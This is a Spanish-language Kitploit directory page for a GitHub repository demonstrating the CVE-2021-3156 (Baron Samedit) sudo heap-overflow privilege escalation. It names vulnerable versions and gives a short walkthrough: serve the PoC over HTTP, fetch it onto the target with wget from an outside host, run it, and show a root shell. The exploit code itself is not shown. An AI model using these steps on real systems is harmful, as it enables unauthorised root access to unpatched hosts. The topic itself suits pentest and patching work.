Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Review.CVE-2021-3156 — CVE-2021-3156-Exploit-Demo | Kitploit
Herramientas/GitHubGitHub/topskiypavelqwertygang/review.cve-2021-3156
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingExplotación de Binarios
GitHubtopskiypavelqwertygang/review.cve-2021-3156

Review.CVE-2021-3156

CVE-2021-3156-Exploit-Demo

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
43hace 1 añoAún no revisado

👑 CVE-2021-3156 (Baron Samedit) — Escalada de Privilegios mediante Desbordamiento de Heap en sudo

📅 Fecha: 2025-06-08
✍️ Autor: @TopskiyPavelQwertyGang 🧠 Investigador de Seguridad | Entusiasta del Red Team


🧠 Resumen del CVE

  • CVE-ID: CVE-2021-3156
  • Tipo: Desbordamiento de Búfer basado en Heap
  • Componente: sudoedit (sudo)
  • Nivel de acceso: Local
  • Objetivo: Obtener privilegios de root

🧠 Descripción

El desbordamiento de heap en sudoedit permite a un usuario local obtener acceso root
al ejecutar el comando sudoedit con parámetros preparados de antemano.

La explotación es efectiva en versiones de sudo < 1.9.5p2, incluidas las imágenes populares de Ubuntu/Debian/CentOS.
Incluso con ASLR habilitado, la vulnerabilidad sigue siendo explotable.


🐾 Condiciones de explotación

root@kitploit:~
OS     : Ubuntu 20.04.3 LTS
glibc  : 2.31 (tcache ON)
sudo   : 1.8.31 (vulnerable)
ASLR   : 2 (habilitado)

🧪 Preparación del entorno

  1. Se verificaron las versiones de glibc y sudo:
root@kitploit:~
ldd --version
sudo --version
  1. Los scripts PoC se transfirieron desde otra máquina mediante un servidor HTTP integrado:
root@kitploit:~
python3 -m http.server 80
  1. En la máquina objetivo, los PoC se descargan y ejecutan:
root@kitploit:~
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py

🚀 Explotación exitosa del PoC

root@kitploit:~
$ python3 exploit_nss.py
# whoami
root

🧾 Conclusión

La explotación de CVE-2021-3156 sigue siendo posible incluso con ASLR activo, si glibc ≥ 2.26 y sudo está en una versión vulnerable.
El exploit más estable resultó ser exploit_nss.py, que funciona a la primera con una configuración NSS correcta.

🧨 Sistema bajo control.


Descargar herramienta